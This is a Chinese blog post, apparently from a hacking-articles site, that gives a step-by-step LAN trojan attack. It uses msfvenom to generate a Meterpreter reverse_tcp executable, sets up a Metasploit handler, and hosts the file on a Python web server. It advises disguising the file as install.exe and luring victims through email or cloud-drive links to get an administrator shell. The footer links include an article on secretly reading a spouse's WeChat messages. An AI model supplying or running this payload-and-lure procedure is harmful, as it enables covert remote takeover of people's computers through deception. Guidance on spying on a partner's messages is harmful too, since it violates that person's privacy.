基于局域网渗透攻击之木马攻击

访客4年前黑客文章1056

使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。

准备环境

攻击机(kali):192.168.29.130

被攻击机(window server 2008 SP2):192.168.29.135

1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe2.kali攻击机打开msfconsoleuse exploit/multi/handler? //使用攻击模块set payload windows/meterpreter/reverse_tcp? //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130 //设置源IP(攻击机IP)set LPORT 4444? //设置源端口(攻击机未被占用端口)show options ? //查看配置选项(选填,可查看未配置选项)3.实施攻击操作4.kali攻击机将木马文件拷贝到指定目录5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 806.查看被攻击者的IP地址详情

7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是更高administrator权限原文链接

相关文章

一篇文章教你搞懂CRM的分类

一篇文章教你搞懂CRM的分类

上一篇聊完了究竟什么是CRM,本篇继续聊聊CRM的分类。 一、根据目标客户划分 根据目标客户的不同,CRM可以分为B-CRM、C-CRM以及比较特殊的双边CRM三种。 1. B-CRM B-CRM...

关于卡片设计的分析与思考

关于卡片设计的分析与思考

卡片是APP常见的设计形式,它既有长处也有漏洞,因此需要按照场景和内容确定揭示形式。本文从四个方面临卡片设计展开阐明,推荐给对卡片设计感乐趣的童鞋阅读。 卡片是移动端产物常见的设计形式,遍及用在种种...

宝宝补充DHA要到几岁 宝宝补充DHA时间推荐

DHA是小宝宝人的大脑和眼底黄斑的关键构成成份,小孩0-三岁是人体的金子发育阶段,必须立即的补充DHA,确保身心健康生长发育,那麼小宝宝补充DHA要到多少岁?下边我产生详细介绍。 小宝宝补充DHA時...

怎么才能查老公微信聊天记录(怎样才能查老公的微信聊天记录)

怎么才能查老公微信聊天记录(怎样才能查老公的微信聊天记录)

本文目录一览: 1、怎样不拿手机查到老公的微信 2、怎么查老公的微信聊天记录 3、怎么查看老公微信和她人聊天记录 怎样不拿手机查到老公的微信 不拿手机是不能查看微信消息的因为微信是以手机为载...

调查一个人要多少钱(调查得花多少钱)

调查一个人要多少钱,社会生活中你肯定也遇到过这种问题,不管是生活还是工作中我们有时候都需要了解一个人的背景和信息。为了得到更好的结果,常常会选择专业的侦探为我们进行服务和帮助,那么我们调查一个人得花多...

黑客帝国主人公的思想(黑客帝国主角图片)

黑客帝国主人公的思想(黑客帝国主角图片)

本文目录一览: 1、《黑客帝国》表达了怎样的哲学思想? 2、《黑客帝国》这部片到底想表达什么思想来的?``都看了三遍,很好看`但不知道它的主题? 3、黑客帝国系列想表达的是什么思想? 4、...